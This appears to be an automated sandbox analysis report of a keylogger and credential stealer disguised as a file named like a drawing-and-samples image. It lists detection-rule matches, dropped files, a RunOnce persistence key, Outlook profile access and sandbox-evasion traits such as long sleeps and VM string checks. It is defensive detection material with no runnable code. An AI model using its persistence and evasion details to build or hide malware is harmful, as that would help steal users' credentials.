                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, --.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, --.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, -i.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, --.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, --.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, -i.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, --.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, --.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, -i.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@3/14@4/5
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, Code function: 0_2_004042CA GetDlgItem,SetWindowTextA,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, Code function: 0_2_00402036 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File created: C:\Users\user\Documents\Udrjestes36
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, Mutant created: NULL
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File created: C:\Users\user\AppData\Local\Temp\nso8152.tmp
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, ReversingLabs: Detection: 31%
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File read: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                Source: unknown, Process created: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, Process created: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, Process created: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: jazy.lnk.0.drLNK file: ..\..\Documents\skinder.mun
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Binary string: mshtml.pdb source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: _.pdb source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17883981680.0000000004770000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mshtml.pdbUGP source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmp

                Data Obfuscation

                Source: Yara matchFile source: 00000000.00000002.17886564519.0000000008520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405EA7 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA7
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_10002CE0 push eax; ret 0_2_10002D0E
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3736F7B9 push ecx; retf 2_2_3736F7C4
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D259A push edx; iretd 2_2_373D259B
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3741EC84 push ss; iretd 2_2_3741EC85
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile created: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dllJump to dropped file
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile created: C:\Users\user\AppData\Roaming\stub\Sophia.exeJump to dropped file
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fileJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Program Files (x86)\Common Files\mastens\topnotcher.epi count: 73505Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeAPI/Special instruction interceptor: Address: 88DE5AA
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeAPI/Special instruction interceptor: Address: 39CE5AA
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeMemory allocated: 34920000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeMemory allocated: 34750000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dllJump to dropped file
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe TID: 2928Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe TID: 2928Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405459 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_00405459
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405E80 FindFirstFileA,FindClose,0_2_00405E80
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"@
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@co
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeAPI call chain: ExitProcess graph end nodegraph_0-4156
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeAPI call chain: ExitProcess graph end nodegraph_0-4298
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405859 LdrInitializeThunk,GetTickCount,GetTempFileNameA,0_2_00405859
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405EA7 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA7
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess token adjusted: DebugJump to behavior
